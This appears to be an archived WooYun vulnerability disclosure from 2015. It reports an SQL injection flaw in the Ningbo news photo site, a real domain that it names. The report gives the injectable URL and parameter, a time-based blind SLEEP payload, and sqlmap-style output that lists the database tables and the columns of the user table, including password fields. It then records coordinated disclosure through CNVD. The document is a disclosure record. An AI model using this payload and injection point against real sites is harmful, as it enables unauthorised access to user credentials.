乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-14: 细节已通知厂商并且等待厂商处理中 2015-04-16: 厂商已经确认,细节仅向厂商公开 2015-04-26: 细节向核心白帽子及相关领域专家公开 2015-05-06: 细节向普通白帽子公开 2015-05-16: 细节向实习白帽子公开 2015-05-31: 细节向公众公开
中国宁波网(宁波日报旗下)存SQL注入,可获取数据库等敏感信息
注入点:http://pic.cnnb.com.cn/showtheme.php?themeid=125119&columnid=photoclass18
---Place: GETParameter: themeid Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: themeid=125040 AND SLEEP(5)&columnid=photoclass18---[14:37:47] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 5web application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL 5.0.11[14:37:47] [INFO] fetching current database[14:37:47] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..[14:38:03] [WARNING] adjusting time delay to 1 secondp[14:38:54] [ERROR] invalid character detected. retrying..[14:38:54] [WARNING] adjusting time delay to 2 secondshoto[14:40:53] [ERROR] invalid character detected. retrying..[14:40:53] [WARNING] adjusting time delay to 3 secondscurrent database: 'photo'
Database: photo[24 tables]+----------------------+| pagetemplate || property || propertyvalue || rectheme || result || temp1 || temp1a || temp1b || temp1c || temp1d || temp2 || temp3 || temp3a || temp3b || temp3c || temp3d || temp3e || theme || theme_pic || themeproperty || themesubjectcolumn || themesubjectlocation || user || usergroup |+----------------------+
Database: photoTable: user[11 columns]+---------------+---------------+| Column | Type |+---------------+---------------+| `` | || factname | || groupid | int(11) || userid | int(11) || userintro | varchar(8000) || username | varchar(255) || userpassed | int(11) || userpassword | varchar(255) || userpic | varchar(255) || usertelephone | varchar(255) || userworkunit | varchar(255) |+---------------+---------------+
themeid 过滤
危害等级:中
漏洞Rank:9
确认时间:2015-04-16 17:42
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给浙江分中心,由浙江分中心后续协调网站管理单位处置
暂无